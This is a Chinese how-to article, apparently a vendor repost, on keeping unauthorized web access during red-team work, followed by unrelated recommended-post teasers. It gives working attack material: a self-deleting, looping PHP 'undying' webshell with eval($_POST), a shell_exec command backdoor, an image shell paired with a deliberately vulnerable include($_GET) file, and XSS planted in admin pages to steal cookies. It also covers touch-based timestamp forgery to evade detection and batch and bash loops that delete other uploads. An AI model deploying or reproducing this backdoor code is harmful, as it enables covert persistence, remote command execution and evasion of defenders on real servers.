如何进行Web权限维持分析

前言

权限维持,在红蓝对抗中,我觉得其意义在于两点:一是防止已获取的权限被蓝队破坏;二是防止其他红队获取到相同的权限(虽然有点缺德。。。)。

其他情况下的非法用途就不说了。

权限维持的原则我觉得就是不能影响原来业务的正常运行。(比如改后台密码导致管理员不能登录,修改文件夹读写权限导致正常的文件不能上传等等)。

后台权限维持

当我们通过弱口令或爆破获取到后台权限,为了防止管理员修改密码或其他红队修改密码,失去权限,在这种情况下需要维持一下后台权限。

自己修改后台密码,当然是最笨的办法。

可以选择的方法,通过在后台源代码中插入xss代码,当然这种情况是已经获取到webshell权限了,当管理员访问后台时,我们就能获取到cookie,具体可参考:

参考

这个感觉有点鸡肋,因为已经有webshell的权限了,为什么还要维持后台权限呢,但是这个的好处就是因为在源代码中插入js代码,不容易被发现,这是优点。

webshell权限维持

常见的权限就是webshell的权限了,当获取到webshell权限后,有可能别蓝队发现,删除掉shell,也有可能其他红队也获取到这个权限。考虑到这两种情况,就需要维持了。

针对蓝队

其他文件夹写入shell:初次上传路径一般都是存放图片等类型文件的文件夹,如果在这样的文件夹中突然出现一个php后缀的文件,那么十有八九会被发现,所以为了避免被蓝队发现,一般做法是在其他可写的文件夹下写入shell。

改写shell的日期:这个主要针对linux平台,因为linux下webshell查杀工具不多,可能会通过命令去查杀。

可能的命令是find命令,比如:

find -name "*.php" -type f -mtime -3 -exec ls -l {} ;

修改方法是touch命令,比如:

touch -d ’08-August-2019′ rrr.php

效果如下:

如何进行Web权限维持分析

如何进行Web权限维持分析

写入不死马:所谓不死马,就是常驻内存的木马,通过循环在某路径下生成shell来维持权限,即使删除了shell,还是会生成。网上的不死马,我试了一下没成功,自己改了一下,最简单的,不免杀,经供参考:

<?php	ignore_user_abort(true);	set_time_limit(0);	unlink(__FILE__);	$file = '3.php';	$code = '<?php @eval($_POST['pass']);?>';	while (1) {		file_put_contents($file, $code);		system('touch -m -d "2018-12-01 09:10:12" 3.php');		usleep(5000);	}?>

写入其他后门:
1.写入命令执行后门,比如:

<?php$cmd=$_GET["name"];echo shell_exec($cmd);?>

如何进行Web权限维持分析

2.图片马结合文件包含脚本:图片马中写入恶意代码,然后在相应位置放置文件包含的漏洞文件,通过访问文件包含漏洞文件去解析图片马,图片马生成shell,然后直接连接。

比如,图片中插入如下代码,用于生成shell:

<?php fputs(fopen("shell.php","w"),"<?php eval($_POST['cmd']);?>")?>

文件包含代码:

<?php  $filename=$_GET['f'];  //将参数file的值传递给$filename变量  include($filename);  //使用include()函数包含文件?>

针对红队

获取webshell常见的情形是通过某一个上传点上传马获取,上传的文件夹路径一般是固定的,不可能一个文件对应一个文件夹。

如果想要阻止其他红队获取到webshell,我的思路是在上传文件夹下写一个批处理或bash,循环判断当前文件夹下的文件类型,发现指定后缀的文件就删除,代码大致如下:

Windows:

@echo offcls if "%1"=="h" goto startstart mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit :startfor %%i in (*.php) do (del %%i)choice /t 5 /d y /n >nulgoto start

Linux:

#! /bin/bash while true;do find . -type f -name "*.php"|xargs rm -rf done

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

文章标题:如何进行Web权限维持分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/29447

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月24日 上午12:32
下一篇 2022年9月24日 上午12:33

相关推荐

  • 电脑0x000007b蓝屏如何修复

    启动无限蓝屏0x000007b修复方法: 方法一: 1、先强制重启电脑,等待开机画面出现后按下快捷键“F12”进入bios系统中。 2、进入bios启动项设置界面,用方向键将光标移动到“advanced”。 3、然后再次选择“SATA Configuration”并按下回车键进行确认。 4、之后会出…

    2022年9月16日
    77400
  • mysql如何将日期转为数字

    2种将日期转为数字的方法:1、使用TO_DAYS()函数,可以将指定日期值转为代表天数的整数值,语法“TO_DAYS(指定日期值)”。2、使用TIME_TO_SEC()函数,可以将指定日期时间值转为代表秒数的整数值,语法“TIME_TO_SEC(指定日期时间值)”。 本教程操作环境:windows7…

    2022年9月21日
    95300
  • WEB开发中常见漏洞防御方法是什么

    SQL注入漏洞 SQL注入漏洞产生原因及危害 在sql查询中很多程序员会将变量拼接入sql语句后再进行查询,这样如果黑客在参数中插入其他sql语句就可能导致我们网站的密码被被黑客查询出来或者被拖取大量数据,如果在开发中使用了字符串拼接进SQL语句就必须进行严格的过滤,任何用户输入的内容都不可信任,以…

    2022年9月26日
    55000
  • 如何入门WEB信息收集

    信息收集(Information Gathering),信息收集是指通过各种方式获取所需要的信息。信息收集是信息得以利用的名列前茅步,也是关键的一步。信息收集工作的好坏,直接关系到整个信息管理工作的质量。 在实战中,前期的信息收集的完整性,很大一部分决定了在对网站进行的测试的成功几率,能够收集的越多…

    2022年9月24日
    97400
  • 电脑黑白打印机能不能扫描出彩色

    黑白打印机能扫描出彩色的吗 答:黑白打印机能扫描出彩色的。 1、如果你的黑白打印机带有扫描功能,那就可以扫描彩色。 2、因为扫描和打印是分开的,不能打印彩色与扫描彩色没有关系。 3、如果我们想要扫描彩色内容的话,可以先连接打印机,打开它。 4、打开后,在“打印与扫描”下选择“扫描文档或照片” 5、然…

    2022年9月24日
    95500
  • MySQL数据库线上如何修改表结构

    一、MDL元数据锁 在修改表结构之前,先来看下可能存在的问题。 1、什么是MDL锁 MySQL有一个把锁,叫做MDL元数据锁,当对表修改的时候,会自动给表加上这把锁,也就是不需要自己显式使用。 当对表做增删改查的时候,加的是MDL读锁 当对表结构做变更修改的时候,加的是MDL写锁 读与读之间不互斥,…

    2022年9月8日
    60900
  • MySQL5.7.31怎么安装和配置

    一、 下载MySQL 1. 选择想要安装的版本,点击Download下载 本篇文章选择的是5.7.31版本 二、 安装MySQL 1. 选择设置类型 双击运行mysql-installer-community-5.7.31.0.msi,这里选择是自定义安装,所以直接选择“Custom”,点击“Nex…

    2022年9月16日
    60400
  • 电脑0xc06d007e如何解决

    0xc06d007e修复方法: 方法一: 1、首先,如果我们是在开启一些图像处理软件或是播放器软件时才会出现问题。 2、那么就可能是因为电脑缺少了Windows Media player软件。 3、下载安装完成后,大家可以尝试再去打开软件,如果打不开的话再尝试下面的方法。 方法二: 1、如果上面的方…

    2022年9月18日
    1.6K00
  • SandboxEscaper披露漏洞POC研究报告是什么

    事件概述 近日,安全研究人员SandboxEscaper在GitHub上发布了针对Windows 10的5个零日漏洞的演示利用代码。 代码分别是: Windows错误报告 Windows任务计划 Windows安装程序 IE11沙箱逃离 Windows AppX部署服务 其中除一、五俩个零日漏洞外,…

    2022年9月15日
    57700
  • laravel是不是aop

    laravel不是aop;aop是“Aspect Oriented Programming”的缩写,意为面向切面编程,是通过预编译方式和运行期间动态代理实现程序功能的统一维护的一种技术,而laravel不是面向切片编程,laravel中间件提供了一种方便的机制来检查和过滤进入应用程序的HTTP请求是…

    2022年9月1日
    43500
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部